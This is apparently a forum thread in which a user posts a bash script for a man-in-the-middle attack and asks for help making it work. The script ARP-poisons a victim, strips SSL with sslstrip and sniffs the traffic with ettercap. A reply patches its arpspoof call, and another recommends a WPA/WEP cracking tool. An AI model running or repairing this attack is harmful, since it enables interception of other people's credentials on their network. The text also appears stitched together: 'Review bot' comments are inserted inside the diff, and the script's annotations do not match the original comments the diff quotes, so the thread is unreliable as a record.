
Thread: SSl Sniff Script Repair

  1. #1
    Just burned his ISO

    Default SSl Sniff Script Repair

    Found the following script. Have been unable to get it to run.
    The error seems to be with the Arpspoof area.

    Should I replace it with Ettercap, or well...what do you guys think?

    Also, it is unclear how to ARP the entire network. I put in // // for the target and the router IP for the gateway, but I am not sure whether that would work, given that the ARP spoof fails.

    I would appreciate any feedback.

    Code:
    #!/bin/bash
    #
    # Synopsis:	A program to sniff traffic in an SSL connection
    # Author:		thims (thims DOT local AT gmail DOT com)
    # Version:	0.3
    # Date:			20091107
    # Comments:	
    #		ToDO:
    
    
    # Defaults. victim and gateway start out empty and are expected to be
    # filled in from the command line; the other two have usable defaults.
    victim=""
    gateway=""
    sslPort="10000"
    etterConf="/etc/etter.conf"
    
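    # Print the usage summary to stdout.
    # Arguments: none
    # Outputs:   one "Usage:" line followed by one line per option
    # The long option names listed are the ones the option parser at the bottom
    # of the script matches (the gateway option is spelled --gw there), and the
    # separator after -i is a comma like on every other line.
    function help() {
      printf '%s\n' \
        "Usage: $0 [args] host" \
        "    -h, --help     -  Print this help and exit" \
        "    -i, --iface    -  Interface to use" \
        "    -e, --etconf   -  Location of etter.conf on the filesystem" \
        "    -v, --victim   -  IP address of desired host" \
        "    -g, --gw       -  IP address of network gateway" \
        "    -s, --sslport  -  Desired port for sslstrip"
    }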
    
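    # Print an optional message to stderr and terminate the script.
    # Arguments: $1 - message to print; nothing is printed when it is empty
    #                 or missing
    # Outputs:   the message on stderr
    # Returns:   never returns; exits with status 1
    function die() {
      # Diagnostics go to stderr so they do not mix with captured stdout, and
      # printf prints the text literally even when it starts with "-n" or "-e".
      if [ -n "${1:-}" ]; then
        printf '%s\n' "$1" >&2
      fi
      exit 1
    }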
    
    # Launch a command in the background under nohup and report whether a
    # process with that name exists five seconds later.
    # Arguments: $1 - the whole command line as one string; further arguments
    #                 are ignored
    # Globals:   cmd, pid (written; neither is declared local)
    # Returns:   0 when a PID was found, 1 when none was found
    function noHup() {
    	cmd="$1"
    	# $cmd is expanded unquoted, so the shell splits the string into the
    	# program name and its arguments; all output is discarded.
    	nohup $cmd > /dev/null &> /dev/null &
    	# fixed wait before looking for the process
    	sleep 5
    	# sslstrip runs under the python interpreter, so it is looked up in the
    	# ps listing instead of with pidof
    	if [ $(echo "$cmd" | awk -F" " '{print $1}') == "sslstrip" ] ;then
    		pid=$(ps ax | grep python | grep sslstrip | awk -F " " '{print $1}')
    	else
    		# pidof is given the first word of the command line
    		pid=$(pidof $(echo "$1" | awk -F" " '{print $1}'))
    	fi
    
    	# NOTE(review): both lookups match by process name, so an instance that
    	# was already running before this call also counts as success.
    	if [ -z "$pid" ] ;then
    		return 1
    	else
    		return 0
    	fi
    }
    
    # Start arpspoof in the background through noHup and record its PID.
    # Globals:   iface, victim, gateway (read)
    # Files:     writes /var/run/sslsniff.arpspoof.run
    # Exits via die when noHup reports that no arpspoof process was found.
    # Defensive note: ARP cache poisoning shows up on the affected host as the
    # gateway IP mapping to a different MAC address; switch features such as
    # dynamic ARP inspection exist to block it.
    function spoofMac() {
    	echo -n "Poisoning the victim...."
    	noHup "arpspoof "$iface" -t "$victim" "$gateway""
    	# noHup returns non-zero when it could not find the process
    	if [ $? -gt 0 ] ;then
    		die "Error: could not initiate arpspoof. Dieing..."
    	fi
    	# PID file is read back by cleanUp
    	echo $(pidof arpspoof) > /var/run/sslsniff.arpspoof.run
    	echo "Ok"
    }
    
    # Turn on IPv4 forwarding, redirect plain-HTTP traffic to a local port and
    # start sslstrip listening on that port.
    # Globals:   sslPort (read)
    # Files:     writes /proc/sys/net/ipv4/ip_forward and
    #            /var/run/sslsniff.sslstrip.run
    # Exits via die when noHup reports that no sslstrip process was found.
    # Only TCP port 80 is redirected, so connections that begin on HTTPS are not
    # touched by this rule; the approach depends on a client making a plain-HTTP
    # request first (sites enforcing HSTS are presumably unaffected — confirm).
    function sslInit() {
    	echo -n "Setting up SSL intercept...."
    	echo 1 > /proc/sys/net/ipv4/ip_forward
    	# re-write the flag until it no longer reads back as 0
    	while [ $(cat /proc/sys/net/ipv4/ip_forward) == 0 ]
    	do
    		echo 1 > /proc/sys/net/ipv4/ip_forward
    	done
    
    	# NAT rule added here is the one cleanUp deletes with the same arguments
    	iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports "$sslPort"
    	# -l gives sslstrip the port the rule above redirects to
    	noHup "sslstrip -a -f -k -l "$sslPort""
    	if [ $? -gt 0 ] ;then
    		die "Error: could not initiate sslstrip. Dieing..."
    	fi
    	# PID file is read back by cleanUp
    	echo $(ps ax | grep python | grep sslstrip | awk -F " " '{print $1}') > /var/run/sslsniff.sslstrip.run
    	echo "Ok"
    }
    
    # Uncomment the iptables redirect lines in etter.conf, then run ettercap in
    # the foreground until it exits.
    # Globals:   etterConf, iface (read)
    # Files:     edits "$etterConf" in place (sed -i); no backup copy is made
    function capture() {
    	# line numbers of every line that contains "redir" (any case) and
    	# "iptables"; sed removes the first '#' found on each of them
    	for linNum in $(cat "$etterConf" | grep -in redir | grep iptables | awk -F: '{print $1}')
    	do
    		sed -i $linNum's/#//' "$etterConf"
    	done
    
    	echo -n "Starting to sniff...."
    	# runs in the foreground; the caller continues only after it exits
    	ettercap -T -q "$iface"
    }
    
    # Stop the background processes and undo the system changes made earlier.
    # Globals:   sslPort, etterConf (read)
    # Files:     reads and removes the two /var/run/sslsniff.*.run PID files,
    #            writes /proc/sys/net/ipv4/ip_forward, edits "$etterConf"
    # NOTE(review): ip_forward is set to 0 unconditionally and every matching
    # etter.conf line gets a '#' prefixed, whatever state either was in before
    # the script started, so the host is not guaranteed to end up as found.
    function cleanUp() {
    	echo "Cleaning up...."
    	echo -n "Closing SSL proxy...."
    	# default signal for the sslstrip PID(s) recorded by sslInit
    	kill $(cat /var/run/sslsniff.sslstrip.run)
    	rm /var/run/sslsniff.sslstrip.run
    	echo "Ok"
    	echo -n "Unpoisoning the victim...."
    	# signal number 2 (SIGINT on Linux) — presumably so arpspoof can restore
    	# the ARP entries before it exits; confirm against its documentation
    	kill  -n 2 $(cat /var/run/sslsniff.arpspoof.run)
    	rm /var/run/sslsniff.arpspoof.run
    	echo "Ok"
    	echo -n "Removing iptables rule and ip_forwarding...."
    	# same rule specification that sslInit appended, deleted with -D
    	iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports "$sslPort"	
    	echo 0 > /proc/sys/net/ipv4/ip_forward
    	echo "Ok"
    	
    	# comment the etter.conf redirect lines out again
    	echo -n "Returning etter.conf to the configuration we found it with...."
    	# same line selection as in capture; sed inserts '#' at the start of each
    	for linNum in $(cat "$etterConf" | grep -in redir | grep iptables | awk -F: '{print $1}')
    	do
    		sed -i $linNum's/^/#/' "$etterConf"
    	done
    	echo "Ok"
    	echo "Have a nice day!"
    }
    
    # Validate the two required addresses, print the settings, then run the
    # stages in order.
    # Globals:   victim, gateway, iface, sslPort (read)
    # Outputs:   the usage text and an error when victim or gateway is empty,
    #            otherwise a summary of the settings
    # cleanUp is reached only after capture returns; no trap is installed in
    # the visible script, so a run that is terminated earlier leaves the
    # iptables rule, ip_forward and etter.conf changes in place.
    function initialize() {
      # Guard clause: die exits, so everything below runs only with both set
      if [ -z "$victim" ] || [ -z "$gateway" ]; then
        help
        echo
        die "Error: a syntactical one"
      fi

      echo "Enviroment details:"
      printf '%s %s %s\n' "    Victim:         " "$victim" "  Ok!"
      printf '%s %s %s\n' "    Gateway/Router: " "$gateway" "  OK!"
      printf '%s %s %s\n' "    Interface:      " "$iface" "  OK!"
      printf '%s %s %s\n' "    SSLStrip port:  " "$sslPort" "  OK!"

      spoofMac
      sslInit
      capture
      cleanUp
    }
    
    
    # Command-line handling. Each pass looks at "$1" (and at "$2" for options
    # that take a value) and then shifts exactly once, so an option's value is
    # examined again on the following pass; a value matches no arm unless it is
    # empty or begins with "-".
    while (( $# > 0 )); do
      case "$1" in
        -h|--help)
          help
          die
          ;;
        -v|--victim)
          victim="$2"
          ;;
        -g|--gw)
          gateway="$2"
          ;;
        -s|--sslport)
          sslPort="$2"
          ;;
        -i|--iface)
          # Rejected only when ifconfig exits with status 1 for this name
          ifconfig "$2" &> /dev/null
          if [ $? -eq 1 ]; then
            die "Error: interface "$2" does not exist!"
          fi
          iface="-i $2"
          ;;
        -e|--etconf)
          # die exits, so the assignment is reached only for an existing path
          [ -e "$2" ] || die "Error: specified ettercap conf does not exist!"
          etterConf="$2"
          ;;
        ''|-*)
          # an empty argument or an unrecognised option
          help
          echo
          die "Error: a syntactical one"
          ;;
      esac
      shift
    done
    
    
    # run the script: option parsing above has finished by this point
    initialize

  2. #2
    Super Moderator Archangel-Amael's Avatar

    Default Re: SSl Sniff Script Repair

    Where did you find this script at?
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  3. #3
    Just burned his ISO ewiget's Avatar

    Default Re: SSl Sniff Script Repair

    There are more errors in this script than just the arpspoof section, but this will get you past that one.

    Code:
    --- sslsniffer.sh.orig  2011-05-12 00:09:29.123538197 -0400
    +++ sslsniffer.sh       2011-05-12 00:10:37.273557277 -0400
    @@ -7,6 +7,7 @@
     # Comments:
     #              ToDO:
     
    +set -x
     
     # leave blank simply here for coding style
     victim=
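Review bot: The `set -x` added near the top of the script is a debugging aid and should not stay in the patch as posted. It traces every expanded command to stderr for the whole run, including the later iptables and sed calls, which buries the script's own progress messages. If tracing is needed while diagnosing the failing call, scope it with `set -x` just before that call and `set +x` after it, or run the unmodified script as `bash -x sslsniffer.sh`.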
    @@ -57,7 +58,7 @@
     # poison the arp
     function spoofMac() {
            echo -n "Poisoning the victim...."
    -       noHup "arpspoof "$iface" -t "$victim" "$gateway""
    +       noHup "arpspoof -i "$iface" -t "$victim" "$gateway""
            if [ $? -gt 0 ] ;then
                    die "Error: could not initiate arpspoof. Dieing..."
            fi
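Review bot: Nothing in the patch records that `iface` changes meaning: with this hunk the call supplies `-i` itself, and the last hunk stores only the bare name (`iface="$2"`) instead of a ready-made option string. A comment beside the assignment, for example `# iface: bare interface name, without the option flag`, would document the new contract for anyone reading either place. spoofMac's body continues past the end of this hunk.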
    @@ -164,7 +165,7 @@
                            if [ $(ifconfig "$2" &> /dev/null; echo $?) == 1 ] ;then
                                    die "Error: interface "$2" does not exist!"
                            else
    -                               iface="-i $2"
    +                               iface="$2"
                            fi
                    ;;
                    "-e"|"--etconf")
    Ed Wiget
    "Job security -- feeding the gates empire!"

  4. #4
    Just burned his ISO

    Default Re: SSl Sniff Script Repair

    Archangel, I found the script in these forums (I think). I thought I had included a reference, but apparently not.

  5. #5
    Just burned his ISO Ro0t_'s Avatar

    Default Re: SSl Sniff Script Repair

    You can try a script called WiPhire which works perfectly, it has an option for MITM using SSLStrip as well as a few others like crack WPA and WEP. I'm not sure if it runs on BT5 but you can give it a shot or just use it to check out the code. It's way easier than typing all the lines in especially when you already know them and their meanings.
    http://sourceforge.net/projects/wiphire/
    "It's Mind over Matter, if you don't have a mind it doesn't matter"
